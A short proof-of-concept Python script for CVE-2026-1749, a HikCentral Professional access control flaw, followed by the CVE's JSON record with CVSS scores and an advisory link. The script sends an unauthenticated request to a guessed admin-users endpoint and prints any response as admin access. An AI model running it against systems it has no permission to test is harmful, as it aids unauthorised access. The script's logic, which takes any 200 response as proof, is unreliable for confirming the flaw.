CVE-2026-1749

import requests # PoC for CVE-2026-1749 # Description: Unauthenticated access control vulnerability in HikCentral Professional TARGET_URL = "http://<target_ip>:<port>/api/v1/admin/users" # Example endpoint def check_vulnerability(url): headers = { "User-Agent": "Mozilla/5.0", "Accept": "application/json" } try: # Send request without authentication headers response = requests.get(url, headers=headers, timeout=5) if response.status_code == 200: print("[+] Potential vulnerability found: Admin access granted without auth.") print("[+] Response content snippet:", response.text[:200]) else: print("[-] Target may not be vulnerable or endpoint is incorrect.") except Exception as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": check_vulnerability(TARGET_URL)

{"cve": {"id": "CVE-2026-1749", "sourceIdentifier": "[email protected]", "published": "2026-05-09T09:16:08.823", "lastModified": "2026-05-11T16:17:29.510", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an Access Control Vulnerability in some HikCentral Professional versions. This could allow an unauthenticated user to obtain the admin permission."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-vulnerability-in-hikcentral-professional/", "source": "[email protected]"}]}}